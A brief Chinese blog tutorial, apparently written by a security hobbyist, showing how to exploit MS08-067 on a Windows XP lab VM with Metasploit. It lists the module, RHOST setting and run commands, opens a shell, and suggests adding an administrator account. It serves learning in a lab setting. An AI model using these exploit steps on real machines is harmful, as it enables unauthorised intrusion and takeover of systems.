当先锋百科网

首页 1 2 3 4 5 6 7

吐舌头本人只是热爱web安全的一名小白,文章只是为了技术提升而分享!大牛勿喷!


本文所使用到的环境工具:


1、win XP SP3 英文版 


下载地址:http://pan.baidu.com/s/1qYjNWBi


解压直接用虚拟机打开就能使用开机密码123456


2、Metasplot (我使用的是基于pentest Box里面集成的MSF)


教程开始:


首先我们先用虚拟机打开靶机查看靶机IP地址




然后确认本机能ping通靶机!




然后打开pentest Box 运行MSF




然后查找我们所需要的漏洞模块,这里我们是针对的MS08-067漏洞所以直接输入search MS08-067




使用此EXP  命令; use exploit/windows/smb/ms08_067_netapi




使用命令show options查看该模块的使用选项




设置攻击目标主机IP地址 set RHOST 192.168.220.129

端口默认445



然后运行run



  成功获取到反弹shell

执行命令shell




看到这个界面就知道了  自己添加个账户提升为管理员登陆就OK了!


好了 教程就到这里  大神勿喷!谢谢!